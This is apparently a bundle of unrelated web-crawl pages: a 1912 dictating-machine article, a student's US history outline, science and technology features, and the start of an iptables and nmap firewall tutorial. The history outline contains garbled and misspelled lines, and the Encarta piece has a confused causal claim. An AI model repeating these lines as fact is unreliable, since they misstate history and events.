The third type of instrument is the dictating phonograph. This has nothing in common with the dictograph used by Detective Burns. The instrument consists of a strand or frame upon which is mounted a cylinder-bearing mechanism and a motor mechanism. By means of a foot-control, which is not clearly shown in the photograph, the motor (either spring or electrically driven) is started and stopped. The speaker sits at a table with his notes before him and speaks into an adjustable tube.
One of these instruments of the kind shown in Fig. 4 was used before the Senate Committee on Interstate Commerce. It was before this committee and recorded upon such a machine that George W. Perkins, many times a millionaire, and formerly business partner of J. Pierpont Morgan, and admitted to be a great authority on organized industry, made his remarkable statement that he had retired from business at the age of 48 because he was tired of making money and that he was devoting the rest of his life to a study of how to do good for the rest of mankind.
The machines as used are employed merely as an intermediate step between shorthand notes and a complete typewritten copy. Expert and highly paid stenographers took down in shorthand notes the name and the exact words of the speaker. These stenographers worked in shifts, each man taking stenographic notes for about an hour at a time. He would then take his written notes to an adjoining room and read them slowly and distinctly into the dictograph instrument, fresh cylinders being supplied whenever needed. By this means a very clear and uniform dictation resulted. A typist took this prepared cylinder to a similar machine arranged to reproduce the sound and transcribed at her leisure the words of the original speaker. By this means a great deal of time was saved since the transcribing could be done by a number of typists. The witnesses called before the committee at 10:30 were thus enabled late in the afternoon to read and correct the original testimony, and each day’s work was thus made complete in itself.
— THANK YOU! | <urn:uuid:0bf41c30-9579-4620-820d-9e5ed7435d3d> | CC-MAIN-2017-09 | http://counterespionage.com/1912-how-detective-burns-listened-to-dynamiter-plots.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170434.7/warc/CC-MAIN-20170219104610-00162-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.967606 | 1,903 | 2.828125 | 3 |
Johnny R. Phillips 10-17-2016 Chapter 6 outline
The Revolution within:
Abigail Adams born in Massachusetts in 1744
The dream of equality:
1.The Revolution unleashed public debates and political and social struggles that enlarged the scope of freedom and challenged inherited structures of power within America.
2.The Declaration of Independence’s assertion that “all men are created equal” announced a radical principle whose full implication could not be anticipated
Expanding the political nation:
1.The democratization of freedom was dramatic for free men.
2.Artisans, small farmers, laborers, and militia all emerged as self-conscious elements in politics.
The revolution in Pennsylvania:
1.The prewar elite of Pennsylvania was dramatic for free men.
2.Pennsylvania’s 1776 constitution sought to institutionalize democracy in a number of ways, including
1.Establishing an annually elected, one-house legislature
2.Allowing tax-paying men to vote
3.Abolishing the office of governor
1.Each state wrote a new constitution, and all agreed that their governments must be republics.
2.One-house legislatures were adopted only by Pennsylvania, Georgia, and Vermont.
3.John Adam’s “balanced governments” included house legislatures.
The right to vote:
1.The property qualification for suffrage was hotly debated.
2.The least democratization occurred in the southern states, where highly deferential political tradition enabled the landed gentry to retain their control of political affairs.
3.By the 1780s, with the exception of Virginia, Maryland, and New York, a large majority of the adult white male population could meet voting requirements.
Toward religious toleration
Joining forces with France and inviting Quebec to join in the struggle against Britain had weakened anti-Catholicism.
Separating church and state:
1.The drive to separate church and state brought together Deists with members of evangelical sects.
2.Many states still limited religious freedom
3.Catholics gained the right to worship without persecution throughout the state
Jefferson and Religious Liberty:
1.Thomas Jefferson’s bill for establishing religious freedom separated church and state.
2.Thanks to religious freedom, the early republic witnessed an amazing proliferation of religious denominations.
3.DEFINING ECONOMIC FREEDOM
Toward free labor:
By the 1800’s indentured servitude had all but disappeared from the United States
The soul of a republic:
To most free Americans, equality meant equal opportunity rather than equality of condition.
The politics of inflation:
Some Americans responded to wartime inflation by accusing merchants of hoarding goods and by seizing stocks of food to be sold at the traditional "just price"
The debate over free trade:
1.Congress urged states to adopt measures to fix wages and prices.
2.Adam Smith’s argument that the “invisible hand” of the market directed economic life more effectively and fairly than government.
4.THE LIMITS OF LIBERTY
The limits of Liberty:
An estimated 20 to 25 percent of Americans were Loyalists.
The Loyalists’ Plight:
1.The war for Independence was in some respect a civil war among Americans.
2.When the war ended, as many as 100,000 Loyalists were banished from the United States or emigrated voluntarily.
The Indian Revolution:
1.American independence meant the loss of freedom for Indians.
Slavery and the revolution:
The irony that Americans cried for Liberty while enslaving Africans.
Obstacles to Abolition:
Some patriots argued that slavery for blacks made freedom possible for whites
The cause of general Liberty:
1.By defining freedom as a universal entitlement rather than as a set of rights specific to a particular place or people, the Revolution inevitably raised questions about the status of slavery in the new nation.
2.Samual Sewall’s The Selling of Joseph (1700) was the first antislavery tract in America
3.In 1773, Benjamin Rush warned that slavery was a “national crime” that would bring “national Punishment”
Petitions for Freedom;
1.Slaves in the north and in the South appropriated the language of liberty for their own purposes.
2.Slaves presented “freedom petitions” in New England in the early 1770s.
1.Nearly 100,000 slaves deserted their owners and fled to British lines.
2.At the end of the war, over 15,000 blacks accompanied the British out of the country.
Abolition in the North:
Between 1777 and 1804, every state north of Maryland took steps toward emancipation.
Free black communities:
After the war, free black communities with their own churches, schools, and leaders came into existence.
I love videos that can explain difficult concepts with simple ones, such as this video that talks about the Diffie-Hellman key exchange, one of the "earliest practical implementations of key exchange within the field of cryptography," as well as the concept of the discrete logarithm. How do they do it? Paint blobs, rope and clocks.
Still, for the traditionalists out there, the video also talked about prime numbers and modular math, which went a bit over my head, but look! Paint blobs!
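For anyone who wants the notation behind the paint-blob analogy, here is the standard textbook sketch of the exchange (this is the general formulation, not something specific to the video). With a public prime p and a public generator g, Alice picks a secret a and Bob picks a secret b:

A = g^a mod p (Alice sends A to Bob)
B = g^b mod p (Bob sends B to Alice)
shared secret: s = B^a mod p = A^b mod p = g^(ab) mod p

An eavesdropper who sees p, g, A and B would have to recover a or b from them, which is the discrete logarithm problem mentioned above.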
Microsoft first delivered Encarta on CD-ROM in 1993 as part of the early wave of multimedia products for PCs, before adding a website as well. In response to criticism of Wikipedia's dubious veracity, Microsoft sought credibility by acquiring other encyclopedias, including Collier's Encyclopedia and New Merit Scholar's Encyclopedia. The company had tried to buy Encyclopedia Britannica but was rebuffed.
Encarta just could not keep up with Wikipedia and fell totally behind. User changes and updates were enabled in 2006, but only after Encarta staff approved them. The result? Encarta Premium, the high-end product, boasted 62,000 articles compared to Wikipedia's 1 million-plus. In March 2009, Microsoft announced it was discontinuing both the Encarta disc and online versions. | <urn:uuid:f06af789-bc97-4a59-853a-23b1eb34dad4> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2288711/data-center/125008-Microsofts-Graveyard-16-products-that-Microsoft-has-killed.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174163.72/warc/CC-MAIN-20170219104614-00438-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.955356 | 159 | 2.515625 | 3 |
Heart Facts - Interesting Facts About Human Heart
Let's get straight to the heart of the matter. The heart's job is to move blood. Here is a collection of amazing and interesting facts about the human heart.
Facts About Human Heart
Day and night, the muscles of your heart contract and relax to pump blood throughout your body. When blood returns to the heart, it follows a complicated pathway. If you were in the bloodstream, you would follow the steps below one by one.
- Oxygen-poor blood (shown in blue) flows from the body into the right atrium.
- Blood flows through the right atrium into the right ventricle.
- The right ventricle pumps the blood to the lungs, where the blood releases waste gases and picks up oxygen.
- The newly oxygen-rich blood (shown in red) returns to the heart and enters the left atrium.
- Blood flows through the left atrium into the left ventricle.
- The left ventricle pumps the oxygen-rich blood to all parts of the body.
Do right and left seem backward? That's because you're looking at an illustration of somebody else's heart. To think about how your own heart works, imagine wearing this illustration on your chest.
Sure, you know how to steal hearts, win hearts, and break hearts. But how much do you really know about your heart and how it works? Read on to your heart's content.
Put your hand on your heart. Did you place your hand on the left side of your chest? Many people do, but the heart is actually located almost in the center of the chest, between the lungs. It's tipped slightly so that a part of it sticks out and taps against the left side of the chest, which is what makes it seem as though it is located there.
Hold out your hand and make a fist. If you're a kid, your heart is about the same size as your fist, and if you're an adult, it's about the same size as two fists.
Interesting Facts About Human Heart
- Your heart beats about 100,000 times in one day and about 35 million times in a year. During an average lifetime, the human heart will beat more than 2.5 billion times. (A rough check of these figures appears after this list.)
- Give a tennis ball a good, hard squeeze. You're using about the same amount of force your heart uses to pump blood out to the body. Even at rest, the muscles of the heart work hard - twice as hard as the leg muscles of a person sprinting.
- Feel your pulse by placing two fingers at pulse points on your neck or wrists. The pulse you feel is blood stopping and starting as it moves through your arteries. As a kid, your resting pulse might range from 90 to 120 beats per minute. As an adult, your pulse rate slows to an average of 72 beats per minute.
- The aorta, the largest artery in the body, is almost the diameter of a garden hose. Capillaries, on the other hand, are so small that it takes ten of them to equal the thickness of a human hair.
- Your body has about 5.6 liters (6 quarts) of blood. This 5.6 liters of blood circulates through the body three times every minute. In one day, the blood travels a total of 19,000 km (12,000 miles) - that's four times the distance across the US from coast to coast.
- The heart pumps about 1 million barrels of blood during an average lifetime - that's enough to fill more than 3 super tankers.
- Lub-DUB, lub-DUB, lub-DUB. Sound familiar? If you listen to your heart-beat, you'll hear two sounds. These "lub" and "DUB" sounds are made by the heart valves as they open and close.
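A rough check of the beat-count figures above, using the adult resting rate of about 72 beats per minute quoted in the list:

72 beats/minute x 60 minutes x 24 hours ≈ 103,680 beats per day
103,680 beats/day x 365 days ≈ 37.8 million beats per year

which is in the same ballpark as the "about 100,000 times in one day" and "about 35 million times in a year" figures above.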
On location in Africa, a movie crew wraps up the day's shooting on a nature documentary and camera operators shut down their rigs. NAND flash cards are removed from the cameras and the scenes that were just shot are transferred to another medium for delivery to a post-production facility. Magnetic tape, the oldest form of storage in digital computing, goes to work.
Long considered slow and outdated, tape is holding on in many enterprises that need cost-effective, long-term storage, and it's even finding new applications in the virtualized and increasingly video-centric world of IT.
Despite declining shipments of equipment over the past several years, tape is increasingly important in some environments, especially large organizations that deal with mountains of information. The relic isn't as obsolete as it seemed.
"A lot of that stigma actually isn't as true as it used to be," Enterprise Strategy Group (ESG) analyst Jason Buffington says. Tape technology is getting faster, it's more economical than hard disk drives (HDDs) and it has a smaller carbon footprint because it requires less power, he says.
As enterprises deal with bigger sets of data and choose or are forced to retain more of it for many years, tape will play an even more vital role, Buffington says.
Fewer Tapes, But Bigger Data
"The more data you have, and the more strategic you are about managing storage, the higher the likelihood is that you are going to continue, if not increase, your footprint on tape," Buffington said. Though overall sales of tape products continue to fall, individual deployments are getting bigger, according to industry analysts.
Nature documentary crews in Africa and Antarctica, among other video teams, have used tape to handle the massive video files that come out of their productions. Now that movies are shot with digital cameras, there's no sending film reels in to be developed and edited, or even scanned for digital editing. Crews use tape for its reliability, the ease of transporting it without fat wide-area network pipes, and the security of physical media, according to Sanjay Tripathi, director and business line executive at IBM's System & Technology Group, Storage Platform.
After the tapes from each day's shooting are sent to the studio or remote production facility, the footage is transferred onto HDDs for editing, then put back on tape as the movie goes on to other production steps. Video is storage-heavy: A feature-length 3-D movie can add up to 4PB or 5PB of data, Tripathi says.
IBM even shared an Emmy award with Fox Broadcasting for developing a workflow that includes offloading content to tape. But in less glamorous settings, tape is stepping in to solve many other storage problems, analysts say.
Data has been stored on magnetic tape since the time of the earliest digital computers in the early 1950s. As HDDs grew in capacity and shrank in price, IT shops started using them for backup instead of tape. That trend continues.
"Tape's been under a lot of pressure in the enterprise," IDC analyst Robert Amatruda says.
Deduplication Drives Disk Sales
Disk-based backups can be accessed immediately, and the files navigated just like primary storage. Data deduplication, which allows information to be stored more efficiently, has helped popularize disk-based backup appliances, Amatruda says.
"It changes the economics of disk very favorably," he said. Sales of such appliances have been growing in double digits over the past few years, he said.
Still, tape remains part of backup in many shops. It's the primary backup medium at 25 percent of enterprises surveyed by ESG, and it's used for backup at 56 percent of the surveyed sites, Buffington said. By comparison, only 2 percent of enterprises said they back up directly to cloud storage.
Tape survives partly due to inertia, says Pund-IT analyst Charles King.
"A lot of it has to do with prior use and existing infrastructure investments," King says. "You've put millions of dollars into it, and it's cheaper to keep the old stuff rolling than it is to migrate to a new system."
However, tape retains the edge over HDDs and flash in many cases. Tape cartridges cost well under $100 and hold terabytes of data. They also consume less power than HDDs because they don't have to be kept spinning. When it comes to transporting very large amounts of data, shipping tapes overnight can be faster and cheaper than using a fat wide-area network pipe.
The classic use case for tape now is long-term data retention, such as holding on to tax returns or medical records. Once they go onto a tape cartridge, those files can sit for years without needing any electricity or drive maintenance.
"If you're going to do that with any kind of scale and any kind of economics, you're going to use tape," ESG's Buffington said.
That type of storage often takes the form of archiving, where it's not an extra copy of the data being stored for recovery but the primary copy of old data that may be rarely used.
"We're seeing tape really change the use case from more of a backup and recovery medium to more of an archive medium," IDC's Amatruda said.
Meanwhile, tape's speed and ease of use are improving. One key advance is Linear Tape File System (LTFS), a standard way of indexing the contents of a tape cartridge within the tape itself. The robotic systems that retrieve tapes used to rely solely on the date when the tape was made. LTFS collects all the information about what's on the tape and includes it there.
"A tape cartridge itself becomes a gigantic USB drive, if you will," IBM's Tripathi said.
That capability can also be expanded to an entire library of data with a system such as IBM's LTFS Library Edition. It will collect the metadata from all the tapes so IT departments can search for and retrieve an individual file from within an entire library, Tripathi said.
LTFS is now used by most major tape vendors, so products of different brands can work together. The backers of LTFS are now seeking to make it a formal standard of the Storage Networking Industry Association, a step that may be completed next year.
Tape is also growing more space efficient, with a standard cartridge based on the new LTO-6 specification holding 2.5TB of data without compression or 6.25TB with compression.
LTO-6 drives can transfer data at 400MB per second. Tape falls behind on speed mainly when it comes to seeking out many small, separate files, said Henry Baltazar, an analyst at The 451 Group.
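As a rough check of those figures (assuming the uncompressed LTO-6 capacity and a sustained 400MB per second, both best-case numbers):

$$ t_{\text{full cartridge}} = \frac{2.5\ \text{TB}}{400\ \text{MB/s}} = \frac{2.5\times10^{12}\ \text{B}}{4\times10^{8}\ \text{B/s}} \approx 6{,}250\ \text{s} \approx 1.7\ \text{hours} $$

Shipping media scales the same way: ten such cartridges sent overnight (call it 24 hours door to door, an assumed figure) move 25TB, an effective rate of roughly 290MB per second, compared with about 125MB per second for a fully utilized 1Gb/s WAN link. That is the arithmetic behind the earlier point that overnighting tapes can beat a fat network pipe.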
Tape Not Slow When It Matters
"Tape is not slow for things that are big," he said. For accessing a single large file such as a video, it's competitive with disk, he said.
Even the robots that find tapes in a library and place them in a drive are faster than they might seem. It typically takes about 30 to 40 seconds to retrieve a tape and get it running, according to IBM.
Enterprises that don't want to deal with tape themselves may now take advantage of it indirectly. Cloud service providers offer value by carrying out IT tasks at a larger scale than their customers can achieve, which gives them a cost advantage. When it comes to storage, the most economical way of doing that may be tape.
"Just because you don't want to deal with tape ... doesn't absolve you of the business requirements of holding your data for five years or seven years," ESG's Buffington says. "Your data almost inevitably is going to still live on tape, before it's over."
While cutting-edge cloud companies may not say they're using tape, it's part of the picture for many of them, he said. For example, the Amazon Glacier service from Amazon Web Services is probably based on tape, analysts say. Glacier is designed for infrequently accessed data and typically delivers information in three to five hours, according to the company. AWS would not confirm that the service uses tape.
Tape also has a role to play in big-data analysis, where crunching large amounts of information from different sources can yield new insights. Even though those operations typically use HDDs for fast access, the data being processed may well come out of long-term tape storage, Baltazar said.
IDC's Digital Universe report released earlier this year, which was sponsored by EMC, estimated that 40 zettabytes of digital data would be produced over the next eight years. That's equivalent to 5,200GB for every person on Earth, the study said. There will be reason to retain much of that data over the long term, according to the report, which estimated that 33 percent of all data by 2020 will contain information that might be worth analyzing.
Meanwhile, storage vendors that make tape equipment aren't backing out of the market, Pund-IT's King said.
"I could imagine a point in the future where tape will become a dinosaur, but right now ... companies are all making hundreds of millions or billions of dollars a year on tape [product] sales," King said. "So I don't envision tape disappearing any time soon."
Stephen Lawson is a senior U.S. correspondent, based in San Francisco, for IDG News service. He covers storage and wired and wireless networks.
10 flaws with the data on Data.gov
Recently released high-value datasets reveal 10 types of deficiencies
Transparency should be a three-legged stool of awareness, access and accuracy. Data.gov, the federal government’s data Web portal, is focusing on the second leg of the stool: access. Of the three, accuracy, which is part of data quality, is the most difficult to achieve but also the most important. If government data is untrustworthy, the government defaults on its backstop role in society.
So, can you trust the data provided on Data.gov? A cursory examination of the newly released high-value datasets revealed 10 types of quality deficiencies.
1. Omission errors. These are a violation of the quality characteristic of completeness. The No. 1 idea on datagov.ideascale.com, the Data.gov collaboration site, is to provide definitions for every column. But many Data.gov datasets do not provide this information. Another type of omission is when dataset fields are sparsely populated, which might omit the key fields necessary for the data to be relevant. For example, a dataset on recreation sites should have the location of the site. Furthermore, many datasets use codes but omit the complete code lists needed to validate the data. Finally, Extensible Markup Language documents omit the XML schema used to validate them even when the schemas clearly exist.
2. Formatting errors. These are violations of the quality characteristic of consistency. Examples are a lack of header lines in comma-separated value files and incorrectly quoted CSV values. Additionally, this includes poorly formatted data values for some numbers and dates. For example, we still see dates such as “5-Feb-10” with a two-digit year. (A quick command-line spot-check for problems like these appears after this list.)
3. Accuracy errors. These are violations of the quality characteristic of correctness. Examples are errors in range constraints, such as a dataset having numbers such as “47199998999988888…”
4. Incorrectly labeled records. These are also violations of the quality characteristic of correctness. Unfortunately, agencies are confused as to when to use CSV files versus Excel files. Some datasets are being labeled as CSV files when they are not record-oriented, which they must be, and are just CSV dumps from Microsoft Excel. This indicates a need for more education and training on information management skills.
5. Access errors. These are violations of correct metadata description. Some datasets advertise that they provide raw data, but when you click the link, you are sent to a Web site that does not provide the raw data.
6. Poorly structured data. These are violations of correct metadata description and relevance. Some datasets are formatted using CSV or XML with little regard to how the data would be used. Specifically, some datasets are formatted in nonrecord-oriented manners in which field names are embedded as data values.
7. Nonnormalized data. These errors violate the principles of normalization, which attempt to reduce redundant data. Some datasets have repeated fields and superfluously duplicated field values.
8. Raw database dumps. Although more of a metadata than data quality issue, this certainly violates the principle of relevance. These datasets have files with names such as table1, table2, etc., and are clearly raw database dumps exported to CSV or XLS. Unfortunately, raw database dumps are usually poorly formatted, have no associated business rules and have terse field names.
9. Inflation of counts. Although also a metadata quality issue, many datasets are differentiated only by year or geography, which clutters search results. A simple solution is to allow multiple files per dataset and thereby combine these by-dimension differences into a single search hit.
10. Inconsistent data granularity. This is yet another metadata quality issue that goes to the purpose of Data.gov and its utility for the public. Some datasets are at an extremely high level while others provide extreme detail without any metadata field denoting them as such.
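Here is a minimal command-line spot-check for the kinds of formatting and accuracy problems described above. The file name and the expected column count are hypothetical, and a plain comma split will miscount fields in rows that contain quoted commas, so treat this only as a first pass:

head -1 recreation_sites.csv                                              # is the first line a header row with column names?
awk -F',' 'NF != 12 {print FNR ": expected 12 fields, got " NF}' recreation_sites.csv   # assumes the dataset documents 12 columns
grep -nE '[0-9]{1,2}-[A-Z][a-z]{2}-[0-9]{2}(,|$)' recreation_sites.csv    # flags two-digit-year dates such as 5-Feb-10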
So what can we do? Here are three basic steps: Attract more citizen involvement to police the data; implement the top ideas on datagov.ideascale.com; and ensure agency open-government plans address, in detail, their data quality processes.
In the 21st century, cybercrime is rampant with hackers stealing and using data from individuals, companies and governments for their personal, financial or political gain. In particular, government agencies and large corporations are prime targets for organized hacker groups (“hacktivists”) such as Anonymous.
For example, this group has been orchestrating its annual April 7 cyber-attacks on US and Israeli targets consistently for the last four years; it is widely anticipated that 2016 will be no exception. The Anonymous attack pattern includes targeting the websites of government agencies and major corporations with mega DDoS attacks with the objective of taking those websites down for as long as possible, causing extensive financial and reputational damages.
Organizations and governments around the globe are well aware of the ongoing cybercrime wave. Major cyberattacks impact well-known brands, governmental agencies, and enterprises of all sizes including their employees. Those in charge of information and data security frequently attend exhibitions, seminars and webinars, and read industry reports to stay ahead. Since the cost of attacks can be daunting, both financially and to the brand, organizations around the globe should be aware of the risks of DDoS attacks and protect themselves. Those that invest in a comprehensive defense program significantly minimize their exposure to those risks. They should deploy effective anti-DDoS and security solutions, as well as continually educate their employees on ways to use the Internet safely and securely for both professional and personal use.
Although it is virtually impossible to be 100% protected against the impact of cyberattacks, security solutions have come a long way since the dawn of the Internet. Anti-DDoS and anti-malware solutions have proved to be highly effective in warding off attacks – even at the scale and sophistication of the Anonymous ones. Those solutions are able to identify the threats, mitigate them and monitor new ones.
A nice example of how an effective security solution works, is the case of hacktivists threatening to disrupt the Catalonian elections in 2015 using DDoS attacks. CTTI, the agency responsible for the Catalonian infrastructure, deployed ServiceProtector to protect its networks in real time, and prevented potential high-volume attacks before any damages were incurred.
Information security is no longer the concern of just a few in the organization. On the contrary, each and every employee should be educated about the risks of online behaviors while the organization as a whole takes measures to effectively protect itself against multiple cyber-risks before they impact the network. And it can be done!
New Standard Aims to Save Massive Amounts of Power
Making networks more energy efficient requires optimizations at many different levels. One of those levels is the access layer for service provider networks that power millions of homes and businesses around the world.
The current method for delivering fibre is not as energy efficient as it could be, according to research from the Alcatel-Lucent led GreenTouch initiative.
"We realized that the way protocols are designed today, actually 99 percent of the data is processed unnecessarily," Peter Vetter, department head at Alcatel-Lucent, Bell Labs, told EnterpriseNetworkingPlanet.com. "So this is a huge opportunity for efficiency improvements."
Vetter is also the wireline working group chief for the GreenTouch effort. Alcatel-Lucent and a consortium of partners launched GreenTouch back in January of 2010 as an effort to help reduce power consumption in networking technologies.
Today, many service providers deliver fiber using a technology known as passive optical network (PON). In a PON deployment, data is passively broadcast to all end points. As such, a PON optical network unit (ONU) has to process the data for all the end points in order to find the traffic intended for a specific home or end point.
"The equivalent is as if the mailman came to your door and opens his mailbag and then asks you to go through all the mail, so you can select the mail that is for you," Vetter explained.
That wastefulness requires the ONU to draw more power, which is where the new research is looking to find efficiencies. One way to achieve better efficiency is by replacing the current PON standard with a new emerging approach called Bit-Interleaved PON (Bi-PON).
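A rough illustration of the waste being removed (the line rates here are hypothetical, chosen only to make the arithmetic simple): on a 10Gb/s PON, an ONU serving a 100Mb/s subscriber today still has to process the entire aggregate stream, so the useful fraction of the data it handles is only

$$ \frac{0.1\ \text{Gb/s}}{10\ \text{Gb/s}} = 1\% $$

which matches Vetter's point that roughly 99 percent of the data is processed unnecessarily.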
"With Bi-PON, instead of organizing the data in packets, we organize the data in bits that are spaced with properties that match the speed of the subscriber," Vetter said. "This allows us to drop the data right behind the receiver so only relevant data is processed."
According to Vetter, Bi-PON offers the opportunity to improve power efficiency by a factor of 30. Moving to Bi-PON, however, is not going to be an immediate option for service providers. Vetter noted it will require new hardware and it will also require new standards to fully implement Bi-PON.
"So this is long term research," Vetter said.
Getting a new Bi-PON standard approved is a process that has its own set of challenges. Vetter explained that the first step to build industry consensus with a group of people that recognize the importance of making a change. GreenTouch has one such working group going to help ensure a roadmap to standardization.
In the interim, there are improvements to PON and ONU deployments that GreenTouch is also working on that provide an enhanced sleep mode that regulates the power based on usage activity. The enhanced sleep mode can work with existing equipment and can potentially be deployed by service providers this year.
"Bi-PON shows how GreenTouch works, by having a fresh look at the protocols, you can get significant savings which you would not get from trying to use stop-gaps like sleep mode," Vetter commented.
For decades now, the international apparel and textile industry has faced a problem that may seem too big to solve: how to reduce or eliminate water pollution that's a direct result of the production process — especially the resource-intensive dyeing process.
The statistics are as familiar as they are disheartening: according to the World Health Organization, 1.1 billion people don't have access to potable water, which is the biggest single cause of illness and disease. The cotton industry produces 30 million tons of the fiber each year, and roughly 13 gallons of water are needed to dye just one pound of cotton. Indeed, of all fibers, cotton requires the most water for the dyeing process. And half of all garments produced annually are made from cotton.
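Taken at face value, those figures imply dye water on an enormous scale. A back-of-the-envelope estimate, assuming short tons and that all of the fiber is dyed (both simplifying assumptions):

$$ 30\times10^{6}\ \text{tons} \times 2{,}000\ \tfrac{\text{lb}}{\text{ton}} \times 13\ \tfrac{\text{gal}}{\text{lb}} \approx 7.8\times10^{11}\ \text{gallons per year} $$

so even a partial shift to a lower-water process would be significant.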
Despite all of the technological advances in manufacturing apparel, the cotton dyeing process hasn't changed significantly since the Industrial Revolution. Most alarming, however: pollution from textile dyeing dumps 72 toxic chemicals into waterways — 30 of which cannot be removed once they've entered the water. The continuing saga in Indian textile production city Tirupur, where manufacturing facilities have come to a standstill after the Noyyal River has become clogged with pollution, is perhaps the most glaring example of the severity of the industry problem.
"We live in a hydrosphere where all water resources are connected," says Alexandra Cousteau, water conservationist and granddaughter of Jacques Cousteau, speaking in New York on August 7. The textile dyeing industry is responsible for 20 percent of worldwide industrial water pollution, the World Bank reports. Cousteau developed her love of oceans when she was 11 years old and exploring their vast expanses with her famous explorer grandfather, the "steward king" of aquatic environments. "When you lose those places, you lose more than a creek or a stream — you lose the opportunity to pass them on to the next generation," she explains.
A different way of doing things
A new startup is hoping to disrupt the status quo and clean up the textile industry's black eye. Backed by 15 years and millions of dollars of research in a North Carolina laboratory, ColorZen pretreats cotton fibers to create a natural affinity between the fiber and dye, thereby eliminating the chemical additives currently required to force the dye to adhere. "We change the fiber on a molecular level, the part that's responsible for attracting or repelling the dye," says ColorZen co-founder Michael Hariri. The process uses 90 percent less water and 75 percent less energy than the standard cotton dyeing procedures, he adds, while achieving the same rich hues and colorfastness. ColorZen launched informally at the Continuum Show this year, following with a formal press event on August 7.
Manufacturers interested in the ColorZen solution avoid additional capital expenditures; the company maintains a dyeing facility and global headquarters in China where apparel producers send their raw cotton fiber for pretreatment and dyeing. The additional time required to ship the fiber to and from the ColorZen facility is balanced out by the reduced dyeing time; the company's dye process takes just one-third of the time of the traditional process, says Hariri. Technical director Tony Leonard claims that with ColorZen's process, 97 percent of the dye chemicals bond to the fabric, creating a significantly cleaner dyebath at the end of the process.
Because ColorZen doesn't rely on freshwater resources for its process, future dyeing facilities can be located virtually anywhere — even in arid regions — and could end up strategically placed near the next link in the global supply chain, says Hariri. As of now, the process works only with cotton and select other natural fibers; the company is looking into expanding the use case for cotton-synthetic blends.
ColorZen initially aims to partner with high-end brands that have the high margins capable of absorbing the modest but additional cost of its alternative dye process. Hariri insists consumers will largely avoid paying a premium for ColorZen products — which will feature specially branded hang tags in stores — explaining that additional costs are mostly recovered during production. "We're going after certain kinds of brands first, those that have already embraced sustainability," he says.
"All brands today want to be sustainable," Hariri adds. "Consumers are demanding it."
Jessica Binns is a Washington, D.C.-based freelance writer specializing in business, technology and social media.
Routers, gateways, firewalls, hubs, and switches make up the network security infrastructure in any business environment. Creating a robust LAN security infrastructure should be one of your priorities if your business regularly handles large amounts of data, some of which may be confidential. This requires you to understand the basic internet security concepts that relate to your devices, storage media and network topologies. Here are the basics explained for you.
A security firewall comes in the form of a software application or a hardware device that is installed at the borders of secured computer networks to control incoming and outgoing communications. Firewalls are considered the first line of defense in network security parlance. At present, four basic types of firewalls are in use: circuit-level firewalls, packet filtering firewalls, application-level firewalls, and stateful inspection gateways.
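To make the packet-filtering category concrete, here is a minimal sketch using iptables, the packet-filtering firewall built into Linux; the subnet and port shown are examples only:

# accept web traffic from the internal subnet, drop other traffic arriving on that port
iptables -A INPUT -p tcp --dport 80 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP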
Network security policies
A network security policy concerns issues with network use. Generally, network policy is categorized into high-level and low-level policy. While high-level security policy tries to get to the base or the root of the security issues, low-level policies encompass placing administrative controls strategically.
In general, a high-level network security policy defines which applications are permissible for use within a business environment, which applications can be used for external communication and which security conditions and protocols to be followed. Periodic security audit and authentication are part of low-level policies.
Routers are physical devices that are used for connecting network segments of various networks into one large network. Routers function at the network layer and the router behavior is largely determined by the protocols that are in use. Unless it is a business requirement, you ought not to mix protocols.
In network security parlance, switches provide what is called micro-segmentation. Switches have largely replaced traditional multiport repeaters and help solve media contention and congestion problems. A network switch can also provide effective protection against attempts to snoop on the network: features such as MAC filtering and port access control allow switches to thwart several common threats.
If you are looking to get familiar with more network security jargon, you need to do some research on the internet. The internet is replete with websites and blogs that provide detailed definitions of networking terms. Alternatively, you can talk to a network security expert to learn the meanings of different industry terms.
Iptables is an application allowing the administration of the tables in the Linux kernel firewall. You don't need prior knowledge about the kernel, or the actual tables in it, for firewall modifications and common system administration tasks.
In some Linux distributions, iptables comes enabled by default. It is common for inexperienced users to recommend completely disabling iptables to avoid networking issues. This article will help you get started quickly and manipulate iptables to your needs.
Sometimes iptables is used to refer to the Linux kernel-level component. In this article, iptables refers specifically to the user-space application that controls the kernel's packet-filtering tables for protocols such as IPv4, IPv6, and ARP.
Similar to other Linux applications, you can configure iptables in the command-line interface or in a plain text file, allowing editing with any text editor. Although it is easy to modify, it might feel awkward from the average firewall appliance where most of the interaction with settings and configurations is done in a graphical interface. There are applications using iptables to manage a firewall through graphical interfaces, but this article will cover interacting with iptables in its native environment: the Linux terminal.
Having a comfort level using a Linux terminal (also referred to as a console or terminal emulator) will help developers take advantage of the examples and configurations that follow. The command-line interface is the primary way to interact with iptables, and a Linux terminal is the application allowing access to this interface.
The rules that are applied are mostly very readable and easily ported to other servers. This feature saves significant time when dealing with unresponsive hardware.
Although iptables is the main subject of this article, and it is probably already installed in your environment, we will also use nmap, which is another powerful application.
Verify that nmap is installed before continuing. You can install this effective network scanner in a Debian/Ubuntu Linux distribution.
Listing 1. Installing nmap on Debian/Ubuntu
sudo apt-get install nmap
Because we are going to make modifications at the kernel level, make sure you have root privileges.
Listing 2 shows the rules currently being applied to the server. Listing 2 will be repeated during the article to verify what rules are currently in use and to verify successful changes.
Listing 2. Currently applied rules
root@desktop:~# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
In Listing 2, we instruct iptables to list all rules currently applied to the firewall. This is accomplished by the -L flag.
The output also mentions Chain INPUT, Chain FORWARD, and Chain OUTPUT. Think of iptables chains as sections in the firewall allowing a certain type of traffic. For example, to block all traffic from the private network to the internet, that rule would be set in the OUTPUT section. Similarly, any rule affecting incoming traffic would be listed in the INPUT chain.
The three chains are each applied to one type of activity in the firewall. At this point, there is nothing set yet. This means there are no restrictions and all network traffic is allowed to come and go.
Before continuing, it is necessary to verify what ports are open on the server for comparison after it is locked down. As mentioned before, nmap is a powerful command line tool that provides network security information. Listing 3 shows the output of nmap in a remote server on the network.
Listing 3. Network scanning with nmap
~ $ nmap 10.0.0.120

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-11-21 20:44 EST
